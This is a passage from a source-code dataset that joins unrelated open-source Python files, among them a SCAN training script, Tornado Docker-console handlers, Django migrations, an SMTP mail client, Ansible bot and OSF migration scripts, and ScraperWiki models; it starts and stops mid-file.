f.write(str(len(c)) + '\t')
f.write(str(ed) + '\t')
f.write(str(wer))
f.write('\n')
f.write(' '.join(a))
f.write('\n')
f.write(' '.join(str(x[0]) for x in e))
f.write('\n')
f.write(' '.join(b))
f.write('\n')
f.write(' '.join(c))
f.write('\n\n')
visualization(i, a, b, c, d, e, directory)
def process(args):
# prepare data
dg = get_data_generator(args.data_name, args)
train_X, train_Y = dg.get_train_data()
test_X, test_Y = dg.get_test_data()
if args.use_start_symbol:
train_X = [['S'] + x for x in train_X]
test_X = [['S'] + x for x in test_X]
ori_test_X, ori_test_Y = test_X, test_Y
# Tokenize
tokenizer = Tokenizer(args)
samples, dicts, lengths, maxs = tokenizer.initialize(
train_X, train_Y, test_X, test_Y)
train_X, train_Y, test_X, test_Y = samples
voc, act = dicts
train_X_len, train_Y_len, test_X_len, test_Y_len = lengths
if args.remove_x_eos:
train_X_len = [x - 1 for x in train_X_len]
test_X_len = [x - 1 for x in test_X_len]
max_input, max_output = maxs
args.input_length = max_input
args.output_length = max_output
# prepare model
model = get_model(args.model_name, args)
model.initialize(len(voc) + 1, len(act) + 1)
model.train(train_X, train_Y, train_X_len, train_Y_len)
model.test(train_X, train_Y, train_X_len, train_Y_len, "Train w. noise", noise_weight=args.noise_weight)
model.test(train_X, train_Y, train_X_len, train_Y_len, "Train w.o. noise")
model.test(test_X, test_Y, test_X_len, test_Y_len, "Test w. noise", noise_weight=args.noise_weight)
prediction, attention, switch, sent_acc = model.test(test_X, test_Y, test_X_len, test_Y_len, "Test w.o. noise")
evaluation(ori_test_X, ori_test_Y, prediction, attention, switch, act, 'logs/' + args.experiment_id)
print("Final sentence accuracy:", str(100 * sent_acc) + '%')
def main(args):
seed = args.random_seed
random.seed(seed)
if args.random_random:
np.random.seed(random.randint(2, 1000))
else:
np.random.seed(seed)
# organizing parameters
if args.remove_noise:
args.noise_weight = 0.0
if args.function_embedding_size <= 0:
args.function_embedding_size = args.embedding_size
process(args)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Compositional Instructions.')
parser.add_argument('--experiment_id', type=str, default='default',
help='experiment ID')
parser.add_argument('--model_name', type=str, default='transformer',
help='model name')
parser.add_argument('--print_output', action='store_true', default=False,
help='Linear max.')
parser.add_argument('--simple_data', action='store_true', default=False,
help='use simple data.')
parser.add_argument('--random_seed', type=int, default=42,
help='random seed')
parser.add_argument('--learning_rate', type=float, default=0.3,
help='learning rate')
parser.add_argument('--batch_size', type=int, default=10,
help='batch_size')
parser.add_argument('--shuffle_batch', action='store_true', default=False,
help='shuffle batch.')
parser.add_argument('--random_batch', action='store_true', default=False,
help='random batch.')
parser.add_argument('--epochs', type=int, default=5000,
help='epochs')
parser.add_argument('--data_name', type=str, default='scan',
help='name of data set')
parser.add_argument('--train_file', type=str,
default='SCAN/add_prim_split/tasks_train_addprim_jump.txt',
help='train file name')
parser.add_argument('--test_file', type=str,
default='SCAN/add_prim_split/tasks_test_addprim_jump.txt',
help='test file name')
parser.add_argument('--switch_temperature', type=float, default=1.0,
help='switch temperature')
parser.add_argument('--attention_temperature', type=float, default=10.0,
help='attention temperature')
parser.add_argument('--num_units', type=int, default=16,
help='num units')
parser.add_argument('--bidirectional_encoder', action='store_true', default=False,
help='bidirectional encoder.')
parser.add_argument('--max_gradient_norm', type=float, default=-1.0,
help='max gradient norm')
parser.add_argument('--decay_steps', type=int, default=-1,
help='decay steps')
parser.add_argument('--use_input_length', action='store_true', default=False,
help='use input length.')
parser.add_argument('--use_embedding', action='store_true', default=False,
help='use embedding.')
parser.add_argument('--embedding_size', type=int, default=32,
help='embedding size')
parser.add_argument('--function_embedding_size', type=int, default=-1,
help='function embedding size')
parser.add_argument('--reg_coe', type=float, default=-1.0,
help='regularization coeficient')
parser.add_argument('--macro_switch_reg_coe', type=float, default=-1.0,
help='macro switch regularization coeficient')
parser.add_argument('--relu_switch', action='store_true', default=False,
help='relu switch')
parser.add_argument('--use_start_symbol', action='store_true', default=False,
help='use start symbol')
parser.add_argument('--content_noise', action='store_true', default=False,
help='add noise to content')
parser.add_argument('--content_noise_coe', type=float, default=-1.0,
help='noise regularization coeficient')
parser.add_argument('--sample_wise_content_noise', action='store_true', default=False,
help='sample-wise noise regularization')
parser.add_argument('--noise_weight', type=float, default=1.0,
help='noise weight')
parser.add_argument('--remove_noise', action='store_true', default=False,
help='remove noise')
parser.add_argument('--function_noise', action='store_true', default=False,
help='add noise to function')
parser.add_argument('--remove_x_eos', action='store_true', default=False,
help='remove x eos')
parser.add_argument('--masked_attention', action='store_true', default=False,
help='masked attention')
parser.add_argument('--remove_switch', action='store_true', default=False,
help='remove switch')
parser.add_argument('--use_entropy_reg', action='store_true', default=False,
help='use entropy reg')
parser.add_argument('--random_random', action='store_true', default=False,
help='random_random')
parser.add_argument('--single_representation', action='store_true', default=False,
help='single representation')
parser.add_argument('--use_decoder_input', action='store_true', default=False,
help='single representation')
parser.add_argument('--output_embedding_size', type=int, default=8,
help='output embedding size')
parser.add_argument('--use_l1_norm', action='store_true', default=False,
help='single representation')
parser.add_argument('--remove_prediction_bias', action='store_true', default=False,
help='remove prediction bias')
parser.add_argument('--clip_by_norm', action='store_true', default=False,
help='clip by norm instead of global norm.')
args = parser.parse_args()
main(args)
| yli1/CGPS | main.py | Python | apache-2.0 | 9,613 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from services.application import ApplicationService
from services.application_access import ApplicationAccessService
import tornado.web
from tornado import gen
import tornado.escape
import json
from util.rabbitmq import send_message
from stormed import Message
import settings
from views import AsyncBaseHandler
import time
class ApplicationRunHandler(AsyncBaseHandler):
s_application = ApplicationService()
@gen.coroutine
def _post_(self):
project_url = self.get_argument("project_url",None)
project_name = self.get_argument("project_name",None)
storage_path = self.get_argument("storage_path",None)
user_id = str(self.current_user.get("_id",None))
user_name = str(self.current_user.get("name",None))
create_time = time.time()
# 数据库操作
insertData = {}
insertData["project_url"] = project_url
insertData["project_name"] = project_name
insertData["storage_path"] = storage_path
insertData["user_id"] = user_id
insertData["status"] = 'created'
insertData["logs"] = [{"create_time":create_time,"info":{"stream":"started run application:"+project_name},"user_id":user_id}]
result = yield self.s_application.insert_application(insertData)
# 加入队列
msg = Message( json.dumps({
"application_id":result["_id"],
"project_url":project_url,
"project_name":project_name,
"storage_path":storage_path,
"user_id":user_id,
"user_name":user_name,
'app_count':1,
"reply_to":'service_logs'
}))
send_message(msg,settings.RUN_APPLICATION_EXCHANGE,settings.RUN_APPLICATION_ROUTING)
if result is None:
self.render_error(error_code=404,msg="not data")
else:
insertData["_id"] = result["_id"]
self.write_result(data=insertData)
class ApplicationInfoHandler(AsyncBaseHandler):
s_application = ApplicationService()
@gen.coroutine
def _post_(self):
application_id = self.get_argument("application_id",None)
app = yield self.s_application.find_one(application_id)
app["_id"] = str(app["_id"])
if app is None:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=app)
class ApplicationsHandler(AsyncBaseHandler):
s_application = ApplicationService()
fields={
"project_url":True,
"project_name":True,
"app_name":True,
"user_id":True,
"user_name":True,
"status":True,
"logs":True,
"update_time":True,
'create_time':True,
"run_host":True,
"inspect_container":True,
"address_prefix":True,
"singleton":True
}
@gen.coroutine
def _get_(self):
spec_type = self.get_argument("spec_type","app_name")
spec_text = self.get_argument("spec_text","")
page_index =int(self.get_argument("page_index",0))
page_size =int(self.get_argument("page_size",20))
spec ={}
spec[spec_type]={ '$regex' : spec_text}
spec["user_id"] = str(self.current_user.get("_id",None))
applications =yield self.s_application.get_appliactions(spec,fields=self.fields,page_index=page_index,page_size=page_size)
if not applications:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=applications)
class ApplicationAccessHandler(AsyncBaseHandler):
s_application = ApplicationService()
s_application_access = ApplicationAccessService()
@gen.coroutine
def _get_(self):
access_id = self.get_argument("access_id",None)
access_info = yield self.s_application_access.find_one(access_id)
if access_info is None:
self.render_error(error_code=404,msg="not data")
else:
self.write_result(data=access_info)
@gen.coroutine
def _post_(self):
access_type = self.get_argument("type",None)
application_id = self.get_argument("id",None)
access_content = self.get_argument("content","")
container_info =yield self.s_application.find_one(application_id)
if container_info is None:
container_info = {}
# 从数据库获取,切记不要对外公开
container_host = container_info.get("run_host",None)
container_name = container_info.get("app_name",None)
if container_host is None or container_name is None:
self.render_error(error_code=404,msg="not success")
user_id = str(self.current_user.get("_id",None))
user_name = str(self.current_user.get("name",None))
create_time = time.time()
# 数据库操作
accessData = {}
accessData["access_type"] = access_type
accessData["application_id"] = application_id
accessData["container_name"] = container_name
accessData["container_host"] = container_host
accessData["access_content"] = access_content
accessData["user_id"] = user_id
accessData["status"] = 'start'
accessData["logs"] = [
{
"create_time":create_time,
"info":"started access application:"+application_id+",it is hosted in "+container_host,
"user_id":user_id
}
]
result= yield self.s_application_access.access_application(accessData)
# 加入队列
msg = Message( json.dumps({
"access_id":result,
"access_type":access_type,
"access_content":access_content,
"application_id":application_id,
"container_host":container_host,
"container_name":container_name,
"user_id":user_id,
"user_name":user_name,
"reply_to":'access_logs'
}))
send_message(msg,settings.ACCESS_APPLICATION_EXCHANGE,settings.ACCESS_APPLICATION_ROUTING+"."+container_host)
if result is None:
self.render_error(error_code=404,msg="not data")
else:
accessData["_id"] = str(result)
self.write_result(data=accessData)
| liuhong1happy/DockerConsoleApp | views/application.py | Python | apache-2.0 | 6,294 |
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new activities.
To determine which activities groups exist, run get_all_activities.py.
Tags: ActivityService.createActivities
"""
__author__ = 'Vincent Tsao'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.common import Utils
# Set the ID of the activity group this activity is associated with.
ACTIVITY_GROUP_ID = 'INSERT_ACTIVITY_GROUP_ID_HERE'
def main(client, activity_group_id):
# Initialize appropriate service.
activity_service = client.GetService('ActivityService', version='v201311')
# Create a daily visits activity.
daily_visits_activity = {
'name': 'Activity #%s' % Utils.GetUniqueName(),
'activityGroupId': activity_group_id,
'type': 'DAILY_VISITS'
}
# Create a custom activity.
custom_activity = {
'name': 'Activity #%s' % Utils.GetUniqueName(),
'activityGroupId': activity_group_id,
'type': 'CUSTOM'
}
# Create the activities on the server.
activities = activity_service.CreateActivities([
daily_visits_activity, custom_activity])
# Display results.
for activity in activities:
print ('An activity with ID \'%s\', name \'%s\', and type \'%s\' was '
'created.' % (activity['id'], activity['name'], activity['type']))
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client, ACTIVITY_GROUP_ID)
| caioserra/apiAdwords | examples/adspygoogle/dfp/v201311/activity_service/create_activities.py | Python | apache-2.0 | 2,305 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import storages.backends.s3boto
class Migration(migrations.Migration):
dependencies = [
('categories', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='category',
name='thumbnail',
field=models.FileField(storage=storages.backends.s3boto.S3BotoStorage(location=b'media'), null=True, upload_to=b'uploads/categories/thumbnails', blank=True),
),
]
| lincolnloop/django-categories | categories/migrations/0002_thumbnail_compat.py | Python | apache-2.0 | 550 |
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import settings
class MailClient(object):
def __init__(self):
'''
Creates a new client
'''
def smtp_login(self):
'''
Logs into the smtp server
Returns the sender's credentials
'''
self.client = smtplib.SMTP(**settings.SMTP)
self.sender = settings.SENDER
self.client.ehlo()
self.client.starttls()
self.client.ehlo()
self.client.login(self.sender, settings.PASSWORD)
return self.sender
def send(self, recipient, body, subject):
'''
Sends an email
recipient = A User objet from the User table
body = The body of the email
subject = The subject of the email
All emails are sent from the address defined in settings.SENDER
'''
email = MIMEMultipart('alternative')
email['From'] = settings.SENDER
email['To'] = recipient.email
email['Subject'] = subject
email.attach(MIMEText(body.encode('UTF-8'), 'html'))
if settings.SEND_EMAIL:
sender = self.smtp_login()
self.client.sendmail(sender, recipient.email, email.as_string())
return email.as_string().split('\n')
class Subjects:
DIGEST = '[Teachboost] Task Digest'
HELP = '[Teachboost] Message Help'
RESPONSE = '[Teachboost] Manager Response'
SUBSCRIPTIONS = '[Teachboost] Your Subscriptions'
REMINDER = '[Teachboost] Friendly Reminder'
| TeachBoost/ansible | library/mailclient.py | Python | mit | 1,568 |
#!/usr/bin/env python
import copy
import json
import os
def get_collection_facts(iw, component_matcher, meta):
# Skip redirection of backports or <2.10 issues ...
is_backport = False
if isinstance(meta.get('is_backport'), bool):
is_backport = meta['is_backport']
else:
'''
if iw.is_issue():
avparts = meta['ansible_version'].split('.')
major = int(avparts[0])
try:
minor = int(avparts[1])
except:
minor = 0
if major < 2 or (major == 2 and minor < 10):
is_backport = True
else:
is_backport = False
else:
is_backport = iw.pullrequest.base.ref != u'devel'
'''
if not iw.is_issue():
is_backport = iw.pullrequest.base.ref != u'devel'
cfacts = {
'is_collection': False,
# notification about collections and closure ...
'needs_collection_boilerplate': False,
# close it ...
'needs_collection_redirect': False,
'collection_redirects': [],
'collection_filemap': {},
'collection_filemap_full': {},
'collection_file_matches': {},
'collection_fqcn_label_remove': set(),
}
cmap = {}
for cm in meta.get(u'component_matches', []):
if cm.get('repo_filename'):
cmap[cm['repo_filename']] = None
fqcns = set()
for key in cmap.keys():
if key in iw.renamed_files.values():
continue
if key in iw.renamed_files:
continue
if component_matcher.gitrepo.exists(key):
continue
cmap[key] = component_matcher.search_ecosystem(key)
if cmap[key]:
for match in cmap[key]:
if match.startswith('collection:'):
fqcns.add(match.split(':')[1])
# do not redirect things that still exist
has_core_files = False
for key in cmap.keys():
if component_matcher.gitrepo.exists(key):
has_core_files = True
break
cfacts['collection_filemap'] = copy.deepcopy(cmap)
cfacts['collection_redirects'] = list(fqcns)
cfacts['collection_fqcns'] = list(fqcns)
if fqcns:
cfacts['is_collection'] = True
# make urls for the bot comment
for k,v in cmap.items():
if v is None:
continue
for idi,item in enumerate(v):
parts = item.split(':')
cmap[k][idi] = k + ' -> ' + 'https://galaxy.ansible.com/' + parts[1].replace('.', '/')
cfacts['collection_file_matches'] = copy.deepcopy(cmap)
# should this be forwarded off to a collection repo?
if fqcns and not has_core_files and (not list([x for x in cmap.values() if not x])) and not is_backport:
cfacts['needs_collection_redirect'] = True
cfacts['component_support'] = ['community']
if not iw.history.last_date_for_boilerplate('collection_migration'):
cfacts['needs_collection_boilerplate'] = True
# loose matching for misc files ...
if not is_backport and fqcns and 'changelog' in ''.join(cmap.keys()):
missing = set()
for k,v in cmap.items():
if not k.startswith('changelogs/') and not k.startswith('test/units/') and not v:
missing.add(k)
if not missing:
cfacts['needs_collection_redirect'] = True
cfacts['component_support'] = ['community']
if not iw.history.last_date_for_boilerplate('collection_migration'):
cfacts['needs_collection_boilerplate'] = True
# allow users to override the redirect
cstatus = iw.history.command_status('needs_collection_redirect')
if cstatus is False:
cfacts['needs_collection_redirect'] = False
cfacts['needs_collection_boilerplate'] = False
# clean up incorrect labels ...
for label in iw.labels:
if label.startswith('collection:'):
fqcn = label.split(':')[1]
if fqcn not in fqcns:
cfacts['collection_fqcn_label_remove'].add(fqcn)
cfacts['collection_fqcn_label_remove'] = list(cfacts['collection_fqcn_label_remove'])
#import epdb; epdb.st()
return cfacts
| jctanner/ansibullbot | ansibullbot/triagers/plugins/collection_facts.py | Python | gpl-3.0 | 4,249 |
from __future__ import unicode_literals
import sys
import logging
from modularodm import Q
from modularodm import exceptions
from website.app import init_app
from scripts import utils as script_utils
from framework.transactions.context import TokuTransaction
from framework.guid.model import Guid
from website.files import models
from addons.box.model import BoxFile
from addons.s3.model import S3GuidFile
from addons.dropbox.model import DropboxFile
from addons.github.model import GithubGuidFile
from addons.dataverse.model import DataverseFile
from addons.figshare.model import FigShareGuidFile
from addons.osfstorage.model import OsfStorageGuidFile
from addons.googledrive.model import GoogleDriveGuidFile
logger = logging.getLogger(__name__)
def paginated(model, query=None, increment=200):
last_id = ''
pages = (model.find(query).count() / increment) + 1
for i in xrange(pages):
q = Q('_id', 'gt', last_id)
if query:
q &= query
page = list(model.find(q).limit(increment))
for item in page:
yield item
if page:
last_id = item._id
def do_migration():
logger.info('Migrating OsfStorage Guids')
migrate_osfstorage_guids()
logger.info('Migrating Box Guids')
migrate_guids(BoxFile, 'box')
logger.info('Migrating S3 Guids')
migrate_guids(S3GuidFile, 's3')
logger.info('Migrating Dropbox Guids')
migrate_guids(DropboxFile, 'dropbox')
logger.info('Migrating Github Guids')
migrate_guids(GithubGuidFile, 'github')
logger.info('Migrating Dataverse Guids')
migrate_guids(DataverseFile, 'dataverse')
logger.info('Migrating figshare Guids')
migrate_guids(FigShareGuidFile, 'figshare')
logger.info('Migrating GoogleDrive Guids')
migrate_guids(GoogleDriveGuidFile, 'googledrive')
def migrate_osfstorage_guids():
for guid in paginated(OsfStorageGuidFile):
if '{{' in guid.waterbutler_path:
logger.warning('OsfStorageGuidFile {} ({}) looks like a google bot link; skipping'.format(guid._id, guid.waterbutler_path.strip('/')))
continue
referent = models.StoredFileNode.load(guid.waterbutler_path.strip('/'))
if referent is None:
logger.warning('OsfStorageGuidFile {} ({}) resolved to None; skipping'.format(guid._id, guid.waterbutler_path.strip('/')))
continue
logger.debug('Migrating guid {}'.format(guid._id))
actual_guid = Guid.load(guid._id)
assert actual_guid is not None
actual_guid.referent = referent
actual_guid.save()
# try:
# assert actual_guid._id == referent.get_guid()._id
# except exceptions.MultipleResultsFound:
# logger.warning('FileNode {!r} has muliple guids referring to it.'.format(referent.wrapped()))
def migrate_guids(guid_type, provider):
cls = models.FileNode.resolve_class(provider, models.FileNode.FILE)
for guid in paginated(guid_type):
# Note: No metadata is populated here
# It will be populated whenever this guid is next viewed
if guid.node is None:
logger.warning('{}({})\'s node is None; skipping'.format(guid_type, guid._id))
continue
if guid.waterbutler_path in ('/{{ revision.osfDownloadUrl }}', '/{{ currentVersion().osfDownloadUrl }}', '/{{ currentVersion().osfDownloadUrl }}', '/{{ node.urls.files }}', '/{{ revision.extra.user.url }}'):
logger.warning('{}({})\'s is a googlebot path; skipping'.format(guid_type, guid._id))
continue
logger.debug('Migrating guid {} ({})'.format(guid._id, guid.waterbutler_path))
try:
file_node = cls(
node=guid.node,
path=guid.waterbutler_path,
name=guid.waterbutler_path,
materialized_path=guid.waterbutler_path,
)
file_node.save()
except exceptions.KeyExistsException:
file_node = cls.find_one(
Q('node', 'eq', guid.node) &
Q('path', 'eq', guid.waterbutler_path)
)
logger.warning('{!r}({}) has multiple guids'.format(file_node.wrapped(), guid._id))
actual_guid = Guid.load(guid._id)
actual_guid.referent = file_node
actual_guid.save()
def main(dry=True):
init_app(set_backends=True, routes=False) # Sets the storage backends on all models
with TokuTransaction():
do_migration()
if dry:
raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
dry = 'dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
| monikagrabowska/osf.io | scripts/migrate_file_guids.py | Python | apache-2.0 | 4,713 |
from model.account import Account, AccountAPIKey, AccountUser
from model.admin import Admin
from model.application import \
Application, \
ApplicationRoute, ApplicationTemplate, ApplicationStaticFile, \
ApplicationStaticContent
from model.general import Plan
| glennyonemitsu/MarkupHiveServer | src/model/__init__.py | Python | mit | 271 |
# Assignment Collector/Grader - a Django app for collecting and grading code
# Copyright (C) 2010,2011 Anthony Rossi <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^AssignmentCollectorGrader/', include('AssignmentCollectorGrader.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
(r'^admin/', include(admin.site.urls)),
(r'^', include('collector.urls')),
)
| rossica/assignmentcollectorgrader | urls.py | Python | agpl-3.0 | 1,480 |
# Copyright (c) 2015 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import eventlet
import murano.dsl.helpers as helpers
import murano.dsl.murano_class as murano_class
import murano.dsl.murano_object as murano_object
import murano.openstack.common.log as logging
LOG = logging.getLogger(__name__)
class MistralError(Exception):
pass
@murano_class.classname('io.murano.system.MistralClient')
class MistralClient(murano_object.MuranoObject):
def initialize(self, _context):
self._clients = helpers.get_environment(_context).clients
def upload(self, _context, definition):
mistral_client = self._clients.get_mistral_client(_context)
mistral_client.workflows.update(definition)
def run(self, _context, name, timeout=600, inputs=None, params=None):
mistral_client = self._clients.get_mistral_client(_context)
execution = mistral_client.executions.create(workflow_name=name,
workflow_input=inputs,
params=params)
# For the fire and forget functionality - when we do not want to wait
# for the result of the run.
if timeout == 0:
return execution.id
state = execution.state
try:
# While the workflow is running we continue to wait until timeout.
with eventlet.timeout.Timeout(timeout):
while state not in ('ERROR', 'SUCCESS'):
eventlet.sleep(2)
execution = mistral_client.executions.get(execution.id)
state = execution.state
except eventlet.timeout.Timeout:
error_message = (
'Mistral run timed out. Execution id: {0}.').format(
execution.id)
raise MistralError(error_message)
if state == 'ERROR':
error_message = ('Mistral execution completed with ERROR.'
' Execution id: {0}. Output: {1}').format(
execution.id, execution.output)
raise MistralError(error_message)
# Load the JSON we got from Mistral client to dictionary.
output = json.loads(execution.output)
# Clean the returned dictionary from unnecessary data.
# We want to keep only flow level outputs.
output.pop('openstack', None)
output.pop('__execution', None)
output.pop('task', None)
return output
| chenyujie/hybrid-murano | murano/engine/system/mistralclient.py | Python | apache-2.0 | 3,020 |
import re
def index(i,j,k):
'''
Fargo3d index calculator.
Input: Strings i,j,k, with the value of the desired index on each direction.
Output: The monodimentional fargo3d index.
'''
value = ''
print i,j,k
#Trivial option
if i == 'i' and j == 'j' and k == 'k':
value += 'l'
return value
if i == 'i' or j == 'j' or k == 'k':
value += 'l'
x = re.match("\w([+-])(\d+)?",i)
y = re.match("\w([+-])(\d+)?",j)
z = re.match("\w([+-])(\d+)?",k)
if x != None:
if int(x.group(2)) >= 2:
print '\nError! The allowed displacement in i direction is up to +/- 1\n'
return
if x.group(1) == '+':
value += 'lxp'
if x.group(1) == '-':
value += 'lxm'
if y != None:
if(y.group(2) == '1'):
value += y.group(1) + 'Nx'
else:
value += y.group(1) + y.group(2) + '*Nx'
if z != None:
if(z.group(2) == '1'):
value += z.group(1) + 'Stride'
else:
value += z.group(1) + z.group(2) + '*Stride'
return value
| adamdempsey90/fargo3d | utils/python/indices.py | Python | gpl-3.0 | 1,131 |
import logging
import sys
import re
import time
import datetime
debug, error, warning, info, success = (None, None, None, None, None)
def dieOnError(err, msg):
if err:
error("%s", msg)
sys.exit(1)
class LogFormatter(logging.Formatter):
def __init__(self, fmtstr):
self.fmtstr = fmtstr
self.COLOR_RESET = "\033[m" if sys.stdout.isatty() else ""
self.LEVEL_COLORS = { logging.WARNING: "\033[4;33m",
logging.ERROR: "\033[4;31m",
logging.CRITICAL: "\033[1;37;41m",
logging.SUCCESS: "\033[1;32m" } if sys.stdout.isatty() else {}
def format(self, record):
record.msg = record.msg % record.args
if record.levelno == logging.BANNER and sys.stdout.isatty():
lines = record.msg.split("\n")
return "\n\033[1;34m==>\033[m \033[1m%s\033[m" % lines[0] + \
"".join("\n \033[1m%s\033[m" % x for x in lines[1:])
elif record.levelno == logging.INFO or record.levelno == logging.BANNER:
return record.msg
return "\n".join(self.fmtstr % {
"asctime": datetime.datetime.now().strftime("%Y-%m-%d@%H:%M:%S"),
"levelname": (self.LEVEL_COLORS.get(record.levelno, self.COLOR_RESET) +
record.levelname + self.COLOR_RESET),
"message": x,
} for x in record.msg.split("\n"))
class ProgressPrint:
def __init__(self, begin_msg=""):
self.count = -1
self.lasttime = 0
self.STAGES = [ ".", "..", "...", "....", ".....", "....", "...", ".." ]
self.begin_msg = begin_msg
self.percent = -1
def __call__(self, txt, *args):
txt %= args
if time.time()-self.lasttime < 0.5:
return
if self.count == -1 and self.begin_msg:
sys.stderr.write("\033[1;35m==>\033[m "+self.begin_msg)
self.erase()
m = re.search("((^|[^0-9])([0-9]{1,2})%|\[([0-9]+)/([0-9]+)\])", txt)
if m:
if m.group(3) is not None:
self.percent = int(m.group(3))
else:
num = int(m.group(4))
den = int(m.group(5))
if num >= 0 and den > 0:
self.percent = 100 * num / den
if self.percent > -1:
sys.stderr.write(" [%2d%%] " % self.percent)
self.count = (self.count+1) % len(self.STAGES)
sys.stderr.write(self.STAGES[self.count])
self.lasttime = time.time()
def erase(self):
nerase = len(self.STAGES[self.count]) if self.count > -1 else 0
if self.percent > -1:
nerase = nerase + 7
sys.stderr.write("\b"*nerase+" "*nerase+"\b"*nerase)
def end(self, msg="", error=False):
if self.count == -1:
return
self.erase()
if msg:
sys.stderr.write(": %s%s\033[m" % ("\033[31m" if error else "\033[32m", msg))
sys.stderr.write("\n")
# Add loglevel BANNER (same as INFO but with more emphasis on ttys)
logging.BANNER = 25
logging.addLevelName(logging.BANNER, "BANNER")
def log_banner(self, message, *args, **kws):
if self.isEnabledFor(logging.BANNER):
self._log(logging.BANNER, message, args, **kws)
logging.Logger.banner = log_banner
# Add loglevel SUCCESS (same as ERROR, but green)
logging.SUCCESS = 45
logging.addLevelName(logging.SUCCESS, "SUCCESS")
def log_success(self, message, *args, **kws):
if self.isEnabledFor(logging.SUCCESS):
self._log(logging.SUCCESS, message, args, **kws)
logging.Logger.success = log_success
logger = logging.getLogger('alibuild')
logger_handler = logging.StreamHandler()
logger.addHandler(logger_handler)
logger_handler.setFormatter(LogFormatter("%(levelname)s: %(message)s"))
debug = logger.debug
error = logger.error
warning = logger.warning
info = logger.info
banner = logger.banner
success = logger.success
| alisw/alibuild | alibuild_helpers/log.py | Python | gpl-3.0 | 3,652 |
import datetime
import time
import os, sys
import re
import urllib
from django.template import RequestContext
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.db.models import Q
from django.core.mail import send_mail
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
import tagging
import hashlib
from codewiki import vc
from codewiki import util
from frontend.models import UserProfile
import textile # yuk
import creoleparser # creoleparser.text2html(cdesc); method may include pre and post processing of text to handle links and paramstrings encoding nicely
try:
import json
except:
import simplejson as json
LANGUAGES_DICT = {
'python' : 'Python',
'php' : 'PHP',
'ruby' : 'Ruby',
'html' : 'HTML',
'javascript' : 'Javascript',
#'css' : 'CSS',
#'wikicreole' : 'Wikicreole',
}
LANGUAGES = [ (k,v) for k,v in LANGUAGES_DICT.iteritems() ]
# used for new scraper/view dialogs
# Add "javascript" to enable Javascript
SCRAPER_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php" ] ]
SCRAPER_LANGUAGES_V = [ '2.7.1', '1.9.2', '5.3.5', '']
VIEW_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php", "html"] ]
HELP_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php"] ]
WIKI_TYPES = (
('scraper', 'Scraper'),
('view', 'View'),
)
PRIVACY_STATUSES = (
('public', 'Public'),
('visible', 'Visible'),
('private', 'Private'),
('deleted', 'Deleted'),
)
STAFF_ACTIONS = set(["run_scraper"])
CREATOR_ACTIONS = set(["delete_data", "undo_delete_data","schedule_scraper", "delete_scraper", "killrunning", "set_privacy_status", "schedulescraper", "set_controleditors" ])
EDITOR_ACTIONS = set(["changeadmin", "savecode", "settags", "stimulate_run", "remove_self_editor", "change_attachables", "attachable_add", "getrawdescription"])
STAFF_EXTRA_ACTIONS = CREATOR_ACTIONS | EDITOR_ACTIONS - set(['savecode']) # let staff also do anything a creator / editor can, except save code is a bit rude (for now!)
VISIBLE_ACTIONS = set(["rpcexecute", "readcode", "readcodeineditor", "overview", "history", "exportsqlite", "setfollow" ])
MAGIC_RUN_INTERVAL = 1000000000
def scraper_search_query_unordered(user, query, apikey=None):
if query:
scrapers = Code.objects.filter(title__icontains=query)
scrapers_description = Code.objects.filter(description__icontains=query)
scrapers_slug = Code.objects.filter(short_name__icontains=query)
scrapers_all = scrapers | scrapers_description | scrapers_slug
else:
scrapers_all = Code.objects
scrapers_all = scrapers_all.exclude(privacy_status="deleted")
u = user
if apikey:
# If we have an API key then we should look up the userprofile and
# use that user instead of the one supplied
try:
